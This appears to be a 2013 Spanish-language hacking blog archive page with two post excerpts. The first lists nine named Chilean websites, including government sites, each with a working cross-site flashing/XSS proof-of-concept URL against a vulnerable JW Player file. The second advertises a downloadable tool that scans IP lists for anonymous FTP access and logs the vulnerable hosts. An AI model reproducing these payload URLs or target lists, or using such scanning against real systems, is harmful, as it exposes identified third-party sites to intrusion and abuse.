Archive for September 2013

[XSF-XSS] Cross Site Flashing – Sitios Chilenos



Buscando sitios chilenos que tuvieran presente JW Player y revisando si la versión era vulnerable, o habia sido actualizada o fixeada para  Cross site Flashing | XSS , gracias a un pequeño script en perl y a Google di con unos sitios los cuales se ven afectados por esta vulnerabilidad.

Lista de sitios Chilenos Afectados:

TOP 8 || GOB y sitios conocidos

http://hacienda.gov.cl/js/jwplayer/player.swf?debug=alert%28/XSFF/%29 

http://www.adnradio.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

http://www.24horas.cl/skins/24horas/gfx/jwplayer/jwplayer.swf?debug=alert%28%22XSFF%22%29

http://www.despegapyme.cl/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

https://gondwana.cl/~gondwana/plugins/muscolplayers/jwplayer/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

http://www.gobiernosantiago.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

http://www.iansa.cl/wp-content/themes/IANSA-2010/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

http://www.ccu.cl/wp/wp-content/themes/CCU-2011/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

http://www.cruzverde.cl/rps_cruzverde_v60/opensite/Cruz%20Verde%20Internet/style/images/guateros-peluche/jwplayer/player.swf?debug=alert%28%22XSFF%22%29

Seguir Leyendo >>

Leer artículo original: [XSF-XSS] Cross Site Flashing – Sitios Chilenos

FINDER FTP ANONIMO 1.0

 
Buenas amigo en este pos presentare una tools sensilla pero eficiente que es lo importante, se trata de una herramienta la cual va probando direcciones ip ubicadas en algun archivo como lista y verifica si tiene acceso como Anonimo en el FTP y si el acceso e correcto lista el directorio del mismo, ademas genera un reporte.log con las ip vulnerables.
Video Demostracion:

Descargar Tool

Leer artículo original: FINDER FTP ANONIMO 1.0